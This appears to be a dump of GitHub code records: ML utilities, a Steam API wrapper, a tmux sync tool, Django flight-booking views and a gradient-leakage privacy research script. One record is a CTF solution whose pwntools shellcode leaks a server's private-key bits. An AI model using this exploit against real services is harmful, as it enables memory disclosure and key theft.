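print(sorted(core.nodes()))                      # [1, 2, 3]: the triangle survives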
df[\"nHLTMuon\"],\n pt=df[\"HLTMuon_pt\"],\n eta=df[\"HLTMuon_eta\"],\n phi=df[\"HLTMuon_phi\"],\n mass=df[\"HLTMuon_phi\"]*0.,\n abseta=np.abs(df[\"HLTMuon_eta\"]),\n )\n\n met_pt = df[\"HLTMET_pt\"]\n met_phi = df[\"HLTMET_phi\"]\n\n return jets, muons, met_pt, met_phi","repo_name":"alpakpinar/HFShapeAnalyzer","sub_path":"candidates.py","file_name":"candidates.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18726909204","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\ndef dataset(directory,size,batchsize):\n\n def _parseOne(ser_example):\n features = {\n \"img_raw\":tf.FixedLenFeature(shape=[],dtype=tf.string),\n \"label\":tf.FixedLenFeature(shape=[],dtype=tf.int64)}\n parsed_example = tf.parse_single_example(ser_example,features)\n\n image = tf.decode_raw(parsed_example[\"img_raw\"],out_type=tf.uint8)\n image = tf.reshape(image,size)\n image = tf.cast(image,tf.float32)*(1./255)-0.5\n\n label = parsed_example[\"label\"]\n label = tf.cast(label,tf.int32)\n label = tf.one_hot(label,depth=2,on_value=1)\n\n return image,label\n\n dataset = tf.data.TFRecordDataset(directory)\n dataset = dataset.map(_parseOne)\n dataset = dataset.batch(batchsize)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\n return dataset\n\ndef showRes(subplot,title,thisimg):\n p = plt.subplot(subplot)\n p.axis(\"off\")\n p.imshow(thisimg)\n p.set_title(title)\n\ndef showimg(index,label,img,ntop):\n plt.figure(figsize=(20,10))\n plt.axis(\"off\")\n ntop = min(9,ntop)\n print(index)\n for i in range(ntop):\n showRes(100+10*ntop+1+i,label[i],img[i])\n plt.show()\n\ndef getOne(dataset):\n iterator = dataset.make_one_shot_iterator()\n elem = iterator.get_next()\n return elem\n\nsample_dir = [\"mydata.tfrecords\"]\nsize = [256,256,3]\nbatchsize = 10\ntdataset = dataset(sample_dir,size,batchsize)\n\nprint(tdataset.output_types)\nprint(tdataset.output_shapes)\n\nelem = getOne(tdataset)\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n try:\n for step in range(1):\n value = sess.run(elem)\n showimg(step,value[1],np.asarray((value[0]+0.5)*255,np.uint8),10)\n except tf.errors.OutOfRangeError:\n print(\"Done!!\")\n\n","repo_name":"chensheng19/Tensorflow-Project-practice","sub_path":"chapter-4/example_8.py","file_name":"example_8.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28916072377","text":"from typing import Callable\nimport torch\nimport torch.nn as nn\n\n\nclass SLPBlock(nn.Module):\n \"\"\"\n _activation_fun_dict -> dict[str, callable]\n \"\"\"\n _activation_fun_dict: dict = {\n \"relu\": nn.functional.relu,\n \"tanh\": nn.functional.tanh,\n \"sigmoid\": nn.functional.sigmoid,\n \"none\": lambda x: x,\n }\n\n def __init__(self,\n in_size: int,\n out_size: int,\n activation_fun: str = \"relu\",\n batch_norm: bool = True,\n dropout: float = 0.0) -> None:\n super().__init__()\n self.layer = nn.Linear(in_size, out_size)\n self.bn = nn.BatchNorm1d(out_size) if batch_norm is True else None\n assert activation_fun in self._activation_fun_dict.keys()\n self.act_fun = self._activation_fun_dict[activation_fun]\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n out = self.layer(x)\n if self.bn is not None:\n out = self.bn(out)\n out = self.act_fun(out)\n return 
self.dropout(out)\n\n\nclass MLP(nn.Module):\n def __init__(self, block_list: list) -> None:\n \"\"\"\n block_list -> list[dict]\n \"\"\"\n super().__init__()\n self.blocks = nn.ModuleList([\n SLPBlock(**block_conf) for block_conf in block_list\n ])\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n out = x\n for block in self.blocks:\n out = block(out)\n return out\n","repo_name":"pskiers/Metric-Learning-KL-loss","sub_path":"model/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4645601093","text":"import torch\nfrom breaching.cases.data.datasets_vision import _build_dataset_vision, _parse_data_augmentations\nfrom omegaconf import OmegaConf\nimport random\n\nimg_scale = 112\nbase_dir = \"..\"\nnum_sample= 100\ntarget_cfg_data = {'db': {'name': None}, 'name': 'bFFHQ_Gender', 'modality': 'vision', 'task': 'classification', 'path': '../data', 'size': 19200, 'classes': 2, 'scale': 112, 'shape': [3, img_scale, img_scale], 'normalize': True, 'mean': [0.4914, 0.4822, 0.4465], 'std': [0.2023, 0.1994, 0.201], 'augmentations_train': {'RandomResizedCrop': img_scale, 'RandomHorizontalFlip': 0.5}, 'augmentations_val': {'Resize': img_scale}, 'augmentations_ats': {'policy':None}, 'default_clients': 100, 'partition': 'random', 'examples_from_split': 'valid', 'batch_size': 128, 'caching': False}\n\n\ncelebahq_cfg_data = {'db': {'name': None}, 'name': 'CelebaHQ_Gender', 'modality': 'vision', 'task': 'classification', 'path': '../data', 'size': 30000, 'classes': 2, 'scale': 112, 'shape': [3, img_scale, img_scale], 'normalize': True, 'mean': [0.506, 0.425, 0.382], 'std': [0.265, 0.245, 0.241], 'augmentations_train': {'RandomResizedCrop': img_scale, 'RandomHorizontalFlip': 0.5}, 'augmentations_val': {'Resize': img_scale}, 'augmentations_ats': {'policy':None}, 'default_clients': 100, 'partition': 'random', 'examples_from_split': 'valid', 'batch_size': 128, 'caching': False}\n\nlfw_cfg_data = {'db': {'name': None}, 'name': 'LFWA_Gender', 'modality': 'vision', 'task': 'classification', 'path': '/home/zx/data', 'size': 13000, 'classes': 2, 'scale': 112, 'shape': [3, img_scale, img_scale], 'normalize': True, 'mean': [0.439, 0.383, 0.342], 'std': [0.297, 0.273, 0.268], 'augmentations_train': {'RandomResizedCrop': img_scale, 'RandomHorizontalFlip': 0.5}, 'augmentations_val': {'Resize': img_scale}, 'default_clients': 100, 'partition': 'random', 'examples_from_split': 'valid', 'batch_size': 128, 'caching': False}\n\n\n\nori_cfg_data = celebahq_cfg_data # or lfw_cfg_data\n\ntarget_cfg_data = OmegaConf.create(target_cfg_data)\nori_cfg_data = OmegaConf.create(ori_cfg_data)\n\n#load model and loss_fn\nfrom breaching.cases.models.model_preparation import construct_model\ncfg_model = \"ResNet18\"\nstate_dict_path = \"\" #provide the trained model\n\n\nstate_dict = torch.load(state_dict_path)\nmodel, loss_fn = construct_model(cfg_model=cfg_model, cfg_data=ori_cfg_data, pretrained=False)\nmodel.model.load_state_dict(state_dict)\n\n\n\n#load target dataset\ntarget_dataset, collect_fn = _build_dataset_vision(cfg_data=target_cfg_data, split='train')\ntarget_dataset.transform = None # do not set the transformation for target images\n\n####load sample from dataset\nsample_list = random.sample(range(len(target_dataset)), num_sample) \nori_transform = _parse_data_augmentations(cfg_data=target_cfg_data, split=\"valid\") # only use valid transform for random images\n\n\ndef 
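Hypothetical usage of the SLPBlock/MLP classes above: a two-layer head whose final block disables batch-norm and activation so it emits raw logits; the sizes are arbitrary.

import torch

blocks = [
    {"in_size": 16, "out_size": 32, "activation_fun": "relu", "dropout": 0.1},
    {"in_size": 32, "out_size": 2, "activation_fun": "none", "batch_norm": False},
]
head = MLP(blocks)                       # MLP/SLPBlock as defined above
print(head(torch.randn(8, 16)).shape)    # torch.Size([8, 2])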
compute_feature(gradients, labels):\n    import torch \n    weights = gradients[-2]\n    bias = gradients[-1]\n    grads_fc_debiased = weights / bias[:, None]\n    features_per_label = []\n    for label in labels:\n        if bias[label] != 0:\n            features_per_label.append(grads_fc_debiased[label])\n        else:\n            features_per_label.append(torch.zeros_like(grads_fc_debiased[0]))\n    return torch.stack(features_per_label)\n\n\n\nclass _LinearFeatureHook:\n    \"\"\"Hook to retrieve input to given module.\"\"\"\n\n    def __init__(self, module):\n        self.features = None\n        self.hook = module.register_forward_hook(self.hook_fn)\n\n    def hook_fn(self, module, input, output):\n        input_features = input[0]\n        self.features = input_features\n\n    def close(self):\n        self.hook.remove()\n\n\nfor module in model.modules():\n    if isinstance(module, torch.nn.Linear):\n        target_refs = _LinearFeatureHook(module)\n\n\ndef get_closest_img(num_sample, gradient_dir, target_dataset, sample_list, ori_transform, reverse=False):\n    closest_imgs_idx = []\n    for idx in range(num_sample):\n        \n        # read the saved gradients for this user from gradient_dir\n        ori_gradients = torch.load(os.path.join(gradient_dir, f\"gradients_{idx}.pth\"))\n        ori_features = compute_feature(ori_gradients, [0])\n\n        distance = []\n\n        for target_img_idx in sample_list:\n            target_img, target_label = target_dataset[target_img_idx]\n\n            transform_target_img = ori_transform(target_img)\n            \n            target_loss = loss_fn(model(transform_target_img.unsqueeze(0)), torch.tensor([target_label]))\n            target_features = target_refs.features\n\n            # record the squared feature distance for later ranking\n            distance.append((ori_features - target_features.to(ori_features.device)).pow(2).mean()) \n            \n        closest_imgs_idx.append(sample_list[torch.argmin(torch.tensor(distance)).item()]) \n    return closest_imgs_idx\n    \n# save the image\n\nimport os\ngradient_dir = f\"{base_dir}/breaching/gradients/celebahq\"\n# gradient_dir = f\"{base_dir}/breaching/gradients/lfwa\"\n\n\nclosest_imgs_idx = get_closest_img(num_sample=num_sample, gradient_dir=gradient_dir, target_dataset=target_dataset, sample_list=sample_list, ori_transform=ori_transform)\nsave_dir = f\"{base_dir}/breaching/out/celeba_hq/search/112\"\n# save_dir = f\"{base_dir}/breaching/out/lfw/search/112\"\n\nfrom PIL import Image\nfor idx, img_idx in enumerate(closest_imgs_idx):\n    target_img, _ = target_dataset[img_idx]\n    if isinstance(target_img, torch.Tensor):\n        import torchvision\n        \n        target_img = torchvision.transforms.ToPILImage()(target_img)\n    if not isinstance(target_img, Image.Image):\n        raise TypeError(\"Target image should be PIL Image object\")\n    user_save_dir = os.path.join(save_dir, f\"user{idx}\")\n    if not os.path.exists(user_save_dir):\n        os.makedirs(user_save_dir, exist_ok=True)\n    target_img.save(os.path.join(user_save_dir, \"0.png\"))\n","repo_name":"LuckMonkeys/DFLeak","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"31078837789","text":"#!/usr/bin/python\nfrom pwn import *\nfrom Crypto.PublicKey import RSA\nfrom hashlib import sha256\n\nimport sys\nimport string\nimport multiprocessing as mp\nimport itertools as it\n\nhost = 'shellcode.balsnctf.com'\nport = 4001\n\nhead = ''\n\ndef check(inp):\n    now = head + ''.join(inp)\n    now = sha256(now).hexdigest()[:2]\n    if now == '00':\n        return ''.join(inp)\n\n\ndef PoW():\n    global head\n    r.recvuntil('sha256(')\n    head = r.recvuntil(' ')[:-1]\n    r.recvuntil('answer =')\n    p = mp.Pool(3)\n    poss = string.digits +
string.ascii_letters\n iterator = it.product(poss, repeat=2)\n print ('start')\n ret = p.map(check, iterator)\n print ('end')\n for i in ret:\n if i is None:\n continue\n r.sendline(i)\n break\n\n\nRSA_LENGTH = 1024\n\ncontext.arch = 'amd64'\npayload='''\nadd rsp, 0x18;\npop rsi;\nsub rsi, 0x4e;\nxor edi, edi;\ninc edi;\nxor edx, edx;\nadd edx, 0x36;\nxor eax, eax;\ninc eax;\nsyscall;\n'''\n\n\nkey = RSA.importKey(open('pub.pem'))\nadjust = asm('push rax;\\npop rax')\npayload = asm(payload)\nlength = len(payload)\nprint (length)\nadd_adjust = (((RSA_LENGTH // 8) - length) // 2) * adjust\n# payload = add_adjust + payload\npayload = payload.ljust(128, '\\x00')\nassert len(payload) == RSA_LENGTH // 8\n\npayload = int(payload.encode('hex'), 16)\npayload = pow(payload, key.e, key.n)\n\npayload = hex(payload)[2:].strip('L')\nif len(payload) % 2 != 0:\n payload = '0' + payload\npayload = payload.decode('hex')\n\nr = remote(host, port)\nPoW()\nsys.stdout.write(r.recvuntil(':'))\nr.sendline(payload)\nsys.stdout.write(r.recvuntil('stuff...\\n'))\nr.recvn(0x10)\nret = ''.join(reversed(r.recvn(38)))\nprint (ret.encode('hex'))\nprint (hex(key.d)[2:].strip('L'))\nleast_304_bits_private_key = int(ret.encode('hex'), 16)\nprint (least_304_bits_private_key)\nr.interactive()\n\n","repo_name":"b04902036/balsnctf-2019","sub_path":"shellcode_writer/share/solution/leak_private_key.py","file_name":"leak_private_key.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"37704337379","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport time\nimport argparse\nimport subprocess\nimport logging\nimport importlib\nfrom pathlib import Path\nfrom datetime import datetime\n\nimport libtmux\nimport hosts\nfrom prettytable import PrettyTable\n\n\ndef strfdelta(tdelta, fmt):\n d = {\"days\": tdelta.days}\n d[\"hours\"], rem = divmod(tdelta.seconds, 3600)\n d[\"minutes\"], d[\"seconds\"] = divmod(rem, 60)\n return fmt.format(**d)\n\n\nclass Syncode(object):\n def __init__(self, cfg):\n self.cfg = cfg\n self.app_name = cfg.app_name\n self.session_name = cfg.app_name\n self.logger = self._get_logger(self.session_name, Path(cfg.log_path))\n self.job_count = {'runing': 0, 'crashed': 0}\n self.session = self._get_session(self.app_name)\n self.jobs = []\n\n def run(self):\n while True:\n self._check_run_jobs()\n self._add_new_jobs()\n self._start_new_jobs()\n self._flush_monitor()\n time.sleep(self.cfg.sleep_interval)\n\n def _check_run_jobs(self):\n for job in self.jobs:\n # @TODO: find a better way to check window's state\n # @TODO: how to address error\n if job['state'] == 'runing':\n try:\n if len(job['window'].attached_pane) == 0:\n job.update({\n 'state': 'crashed',\n 'stop_time': datetime.now(),\n })\n self.job_count['run'] -= 1\n self.job_count['crashed'] += 1\n\n self.logger.info(f'finish job {job[\"name\"]}')\n\n except Exception as e:\n job.update({\n 'state': 'crashed',\n 'stop_time': datetime.now(),\n })\n\n self.job_count['runing'] -= 1\n self.job_count['crashed'] += 1\n\n self.logger.info(f'finish job {job[\"name\"]}')\n self.logger.error(e)\n\n def _add_new_jobs(self):\n importlib.reload(hosts)\n from hosts import HOSTS\n for sess_name, host in HOSTS.items():\n cmd = f'''when-changed -v -r -1 -s {host['source_path']} -c \\\"rsync -auvz --timeout=5 {host['source_path']}/ {host['host_name']}:{host['dest_path']}; echo \\\\\"\\\\033[0;31m\\\\$(date)\\\\033[0m\\\\n\\\\\"\\\" '''\n print(cmd)\n if not 
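A Python 3 sketch of the same sha256 proof-of-work search used in PoW() above; hashlib needs bytes in Python 3, and a matching two-character suffix is only probabilistically guaranteed to exist for a given prefix.

import itertools
import string
from hashlib import sha256

def solve_pow(head: bytes) -> str:
    alphabet = string.digits + string.ascii_letters
    for pair in itertools.product(alphabet, repeat=2):
        suffix = "".join(pair)
        if sha256(head + suffix.encode()).hexdigest().startswith("00"):
            return suffix
    raise ValueError("no two-character suffix works for this head")

# e.g. solve_pow(b"...prefix read from the server banner...")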
self._job_exists(sess_name):\n self.jobs.append({\n 'name': sess_name,\n 'state': 'wait',\n 'cmd': cmd,\n 'window': None,\n 'window_index': None,\n 'start_time': None,\n 'stop_time': None,\n })\n\n self.logger.info(f'add job {sess_name}')\n\n def _job_exists(self, sess_name):\n for job in self.jobs:\n if job['name'] == sess_name:\n return True\n return False\n\n def _start_new_jobs(self):\n for job in self.jobs:\n if job['state'] == 'wait':\n cmd = job[\"cmd\"]\n window = self.session.new_window(attach=False, window_name=job['name'], window_shell=cmd)\n\n job.update({\n 'window': window,\n 'window_index': window['window_index'],\n 'state': 'runing',\n 'start_time': datetime.now(),\n })\n\n self.job_count['runing'] += 1\n\n self.logger.info(f'start job {job[\"name\"]}')\n\n time.sleep(5) # avoid start jobs at the same time\n\n def _flush_monitor(self):\n subprocess.call(\"clear\")\n\n table = PrettyTable()\n table.field_names = ['Name', 'State', 'Tmux', 'Start', 'Stop', 'Duration (s)']\n\n cmds = []\n for job in self.jobs:\n start_time = '' if job['start_time'] is None else \\\n job['start_time'].strftime(\"%Y/%m/%d %H:%M:%S\")\n stop_time = '' if job['stop_time'] is None else \\\n job['stop_time'].strftime(\"%Y/%m/%d %H:%M:%S\")\n duration = '' if job['stop_time'] is None else \\\n strfdelta((job['stop_time'] - job['start_time']),\n '{days} days {hours}:{minutes}:{seconds}')\n table.add_row([job['name'], job['state'], job['window_index'], start_time, stop_time, duration])\n cmds.append(job['cmd'])\n\n print(table)\n print(f'{datetime.now().strftime(\"%b %d %Y %H:%M:%S\")} ({self.cfg.sleep_interval}s) '\n f'runing: {self.job_count[\"runing\"]} crashed: {self.job_count[\"crashed\"]}')\n\n print('\\n'.join(cmds))\n\n def _get_session(self, name):\n server = libtmux.Server()\n\n session = server.find_where({'session_name': name})\n if session is None:\n session = server.new_session(session_name=name, attach=False)\n\n return session\n\n def _get_logger(self, name, save_dpath):\n logger = logging.getLogger(name)\n logger.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\n \"%(asctime)s: %(levelname)5s [%(filename)s:%(lineno)4d] %(message)s\",\n \"%Y-%m-%d %H:%M:%S\")\n\n log_fpath = save_dpath / f'{name}-{datetime.now().strftime(\"%Y%m%d%H%M%S\")}.log'\n log_fpath.parent.mkdir(parents=True, exist_ok=True)\n\n fh = logging.FileHandler(log_fpath)\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n return logger\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=None,\n # show default in -h\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('-c', '--config', dest='config_path', type=Path,\n default='./xxx',)\n parser.add_argument('-l', '--log', dest='log_path', type=Path,\n default='./logs/',)\n parser.add_argument('-n', '--name', dest='app_name', type=str,\n default='Syncode',)\n parser.add_argument('-i', '--interval', dest='sleep_interval', type=int,\n default=60)\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n syncode = Syncode(args)\n syncode.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lampvision/syncode","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39893868138","text":"import requests\nimport json\n\nclass SteamAPI():\n def __init__(self, apikey):\n self.apikey = apikey\n self.r = 
requests.Session()\n\n def get(self, path, version, params={}):\n params['format'] = 'json'\n url = \"https://api.steampowered.com/%s/%s/\" % (path, version)\n r = self.r.get(url, params=params)\n return r.json()\n\n def GetSupportedAPIList(self):\n '''Get all APIs'''\n path = \"ISteamWebAPIUtil/GetSupportedAPIList\"\n version = \"v0001\"\n params = {}\n return self.get(path, version, params)\n\n # GetNewsForApp (v0002)\n def GetNewsForApp(self, appid, count=1, maxlength=300):\n '''GetNewsForApp returns the latest of a game specified by its appID.'''\n path = \"ISteamNews/GetNewsForApp\"\n version = \"v0002\"\n params = {\n \"appid\": appid,\n \"count\": count,\n \"maxlength\": maxlength\n }\n return self.get(path, version, params)\n\n # GetGlobalAchievementPercentagesForApp (v0002)\n def GetGlobalAchievementPercentagesForApp(self, gameid):\n '''Returns on global achievements overview of a specific game in percentages.'''\n path = \"ISteamUserStats/GetGlobalAchievementPercentagesForApp\"\n version = \"v0002\"\n params = {\n \"gameid\": gameid\n }\n return self.get(path, version, params)\n\n # GetGlobalStatsForGame (v0001)\n def GetGlobalStatsForGame(self, appid, name=[], count=1):\n \"\"\"\n Note: name is a list of achievement names\n \"\"\"\n path = 'ISteamUserStats/GetGlobalStatsForGame'\n version = 'v0001'\n params = {\n 'appid': appid,\n 'count': count\n }\n i = 0\n for n in name:\n params[\"name[%s]\" % i] = n\n i += 1\n print(params)\n return self.get(path, version, params)\n\n # GetPlayerSummaries (v0002)\n def GetPlayerSummaries(self, steamids):\n '''Returns basic profile information for a list of 64-bit Steam IDs.'''\n path = \"ISteamUser/GetPlayerSummaries\"\n version = \"v0002\"\n params = {\n \"key\": self.apikey,\n \"steamids\": steamids\n }\n return self.get(path, version, params)\n\n # GetFriendList (v0001)\n def GetFriendList(self, steamid, relationship='friend'):\n '''Returns the friend list of any Steam user, provided their Steam Community profile visibility is set to \"Public\".'''\n path = \"ISteamUser/GetFriendList\"\n version = \"v0001\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"relationship\": relationship\n }\n return self.get(path, version, params)\n\n # GetPlayerAchievements (v0001)\n def GetPlayerAchievements(self, appid, steamid, l=\"en\"):\n '''Returns a list of achievements for this user by app id'''\n path = \"ISteamUserStats/GetPlayerAchievements\"\n version = \"v0001\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"appid\": appid,\n \"l\": l\n }\n return self.get(path, version, params)\n\n # GetUserStatsForGame (v0002)\n def GetUserStatsForGame(self, appid, steamid, l=\"en\"):\n '''Returns a list of achievements for this user by app id'''\n path = \"ISteamUserStats/GetUserStatsForGame\"\n version = \"v0002\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"appid\": appid,\n \"l\": l\n }\n return self.get(path, version, params)\n\n # GetOwnedGames (v0001)\n def GetOwnedGames(self, steamid, include_appinfo=False, include_played_free_games=False, appids_filter=[]):\n '''\n GetOwnedGames returns a list of games a player owns along with some \n playtime information, if the profile is publicly visible. 
Private, \n friends-only, and other privacy settings are not supported unless you \n are asking for your own personal details (ie the WebAPI key you are \n using is linked to the steamid you are requesting).\n '''\n path = \"IPlayerService/GetOwnedGames\"\n version = \"v0001\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"include_appinfo\": include_appinfo,\n \"include_played_free_games\": include_played_free_games,\n \"appids_filter\": appids_filter,\n }\n return self.get(path, version, params)\n\n # GetRecentlyPlayedGames (v0001)\n def GetRecentlyPlayedGames(self, steamid, count=200):\n '''\n GetRecentlyPlayedGames returns a list of games a player has played in \n the last two weeks, if the profile is publicly visible. Private, \n friends-only, and other privacy settings are not supported unless you \n are asking for your own personal details (ie the WebAPI key you are \n using is linked to the steamid you are requesting).\n '''\n path = \"IPlayerService/GetRecentlyPlayedGames\"\n version = \"v0001\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"count\": count\n }\n return self.get(path, version, params)\n \n # IsPlayingSharedGame (v0001)\n def IsPlayingSharedGame(self, steamid, appid_playing):\n '''\n IsPlayingSharedGame returns the original owner's SteamID if a borrowing \n account is currently playing this game. If the game is not borrowed or \n the borrower currently doesn't play this game, the result is always 0.\n '''\n path = \"IPlayerService/IsPlayingSharedGame\"\n version = \"v0001\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"appid_playing\": appid_playing\n }\n return self.get(path, version, params)\n\n # GetSchemaForGame (v2)\n def GetSchemaForGame(self, appid):\n '''\n GetSchemaForGame returns gamename, gameversion and availablegamestats\n (achievements and stats).\n '''\n path = \"ISteamUserStats/GetSchemaForGame\"\n version = \"v2\"\n params = {\n \"key\": self.apikey,\n \"appid\": appid,\n }\n return self.get(path, version, params)\n\n # GetPlayerBans (v1)\n def GetPlayerBans(self, steamids):\n '''\n GetPlayerBans returns Community, VAC, and Economy ban statuses for \n given players.\n '''\n path = \"ISteamUser/GetPlayerBans\"\n version = \"v1\"\n params = {\n \"key\": self.apikey,\n \"steamids\": steamids,\n }\n return self.get(path, version, params)","repo_name":"rgooler/steam-game-stat-tracker","sub_path":"steamgamestattracker/steamapi.py","file_name":"steamapi.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25054370252","text":"from django.contrib import auth\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import redirect, render\n\nfrom django.urls import reverse\nfrom flight_booking.models import *\nfrom datetime import datetime\nfrom django.contrib import messages\n\nfrom django.shortcuts import get_object_or_404\nfrom django.views.generic import View\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.forms.models import model_to_dict\nfrom django.db.models import Max\nfrom django.shortcuts import render, HttpResponse, HttpResponseRedirect\n\n# ----------------Home page (search)------------------------------------\ndef search(request):\n city = City.objects.all()\n min_date = f\"{datetime.now().date().year}-{datetime.now().date().month}-{datetime.now().date().day}\"\n max_date = f\"{datetime.now().date().year if 
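Hypothetical usage of the SteamAPI wrapper above; the key and the 64-bit SteamID are placeholders, and each call performs a live HTTP request and returns the parsed JSON payload.

api = SteamAPI("YOUR_WEB_API_KEY")                       # class defined above
news = api.GetNewsForApp(440, count=2, maxlength=120)    # 440 = Team Fortress 2
games = api.GetOwnedGames("76561197960435530", include_appinfo=True)
print(news, games)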
(datetime.now().date().month+3)<=12 else datetime.now().date().year+1}-{(datetime.now().date().month + 3) if (datetime.now().date().month+3)<=12 else (datetime.now().date().month+3-12)}-{datetime.now().date().day}\"\n if request.method == 'POST':\n departure = request.POST.get('departure')\n destination = request.POST.get('destination')\n departure_date = reFormatDateMMDDYYYY(\n request.POST.get('departure_date'))\n seat_class = request.POST.get('seat_class')\n return render(request, 'search.html', {\n 'departure': departure,\n 'destination': destination,\n 'departure_date': departure_date,\n 'seat_class': seat_class,\n 'city': city\n })\n\n else:\n return render(request, \"search.html\", {\n 'min_date': min_date,\n 'max_date': max_date,\n 'city': city\n })\n\n#-------------------------Get data from search page and go to View flight page--------------\n\ndef flight_view(request):\n if request.method=='GET':\n departure = request.GET.get('departure')\n destination = request.GET.get('destination')\n seat_class = request.GET.get('seat_class')\n date = request.GET.get('departure_date')\n departure_date = reFormatDateMMDDYYYY(request.GET.get('departure_date'))\n \n try:\n # print(\"try to check if departure date is exist in database\")\n flights = Flight.objects.select_related(\"flight_id\",\"flight_detail\").filter(path_id__departure = departure,\n path_id__destination=destination,flight_id__seat_class=seat_class,\n flight_detail__departure_date=date)\n \n city_a = City_A.objects.filter(city_id=departure)\n city_b = City_B.objects.filter(city_id=destination)\n except:\n print(\"ERROR!\")\n return redirect('/searchflight')\n else:\n \n return render(request,'view.html',{\n 'flights' : flights,\n 'departure' : city_a[0] ,\n 'destination' : city_b[0],\n 'seat_class' : seat_class,\n 'departure_date': departure_date,\n 'date' : date\n })\n else: \n print('ERROR!')\n return redirect('/')\n\n#---------------view flight page ------------------\ndef viewflight(request):\n return render(request, 'view.html')\n\n#------------register and login form------------------\ndef registerForm(request):\n return render(request, 'register.html')\n\n\ndef loginform(request):\n return render(request, 'loginform.html')\n\n# --------------Add new user (from register page) to database--------------------------\n\ndef addUser(request):\n Firstname = request.POST['Firstname']\n Lastname = request.POST['Lastname']\n email = request.POST['email']\n username = request.POST['username']\n password = request.POST['password']\n repassword = request.POST['repassword']\n\n if password == repassword:\n if User.objects.filter(username=username).exists():\n messages.info(request, \"This Username is already used.\")\n return redirect('/register')\n elif User.objects.filter(email=email).exists():\n messages.info(request, \"This email is already used.\")\n return redirect('/register')\n\n else:\n user = User.objects.create_user(\n username=username,\n email=email,\n password=password,\n first_name=Firstname,\n last_name=Lastname\n )\n user.save()\n return redirect('/login')\n else:\n messages.info(request, \"Password doesn't match.\")\n return redirect('/register')\n\n#---------------authenticate user and login--------------------\n\ndef login(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = auth.authenticate(username=username, password=password)\n if user is not None:\n auth.login(request, user)\n return redirect('/')\n else:\n messages.error(request, 
\"Incorrect Username/Password\")\n return redirect('/loginform')\n else:\n return render(request, 'loginform.html')\n\n#--------------Logout----------------------------\n\ndef logout(request):\n auth.logout(request)\n return redirect('/')\n\n\n# --------------------Get details from view page (when you choose any flight)-------------------------------\n\ndef booking(request,fid,path,date,seat_class):\n\n booking_detail = Flight.objects.select_related(\"flight_detail\",\"flight_id\",\"path_id\").get(flight_id=fid,flight_detail__departure_date=date, \n flight_id__seat_class=seat_class,path_id=path)\n duration = booking_detail.duration\n path_id = Travel.objects.filter(path_id=path)\n depart_detail = City_A.objects.filter(city_id=path_id[0].departure)\n desti_detail = City_B.objects.filter(city_id=path_id[0].destination)\n date = reFormatDateMMDDYYYY(date)\n return render(request,'booking.html',{\n 'booking_detail' : booking_detail,\n 'departure_date' : date,\n 'departure' : depart_detail,\n 'destination' : desti_detail,\n 'duration' : duration\n })\n\n\n#--------------Add passenger (fill in booking page) after press proceed to payment button---------------\n\ndef addPassenger(request):\n if request.method == 'POST':\n flight_id = request.POST['flight_id']\n departure_date = request.POST['departure_date']\n seat_class = request.POST['seat_class']\n total_amount = reFormatNumber(request.POST['total_amount'])\n username = request.POST['username']\n passengerscount = request.POST['passengersCount']\n ticket = createticket(flight_id,departure_date,seat_class,total_amount,username)\n for i in range(1, int(passengerscount)+1): \n if Passenger.objects.count() != 0:\n id_max = Passenger.objects.aggregate(Max('id'))['id__max']\n next_id = str(int(id_max)+1)\n else:\n next_id = \"0\"\n id = next_id \n fname = request.POST[f'fname{i}']\n lname = request.POST[f'lname{i}']\n email = request.POST[f'email{i}']\n phone = request.POST[f'phone{i}']\n id_no = request.POST[f'idno{i}']\n passenger = Passenger.objects.create(\n id=id,\n first_name=fname, \n last_name=lname, \n email=email,\n phone_no=phone,\n id_no=id_no,\n ticket_id=ticket,\n )\n passenger.save()\n ticket_id = ticket.ticket_id\n print('ticket:',ticket_id)\n\n return render(request,'payment.html',{\n 'ticket_id':ticket_id,\n 'total_amount':total_amount\n })\n \n else:\n return redirect('/')\n\n\n#-----------in Payment page and response to congratulation page------------------------------------\n\ndef confirm(request):\n if request.method == 'POST':\n ticket_id = request.POST.get('ticket_id')\n try:\n ticket = 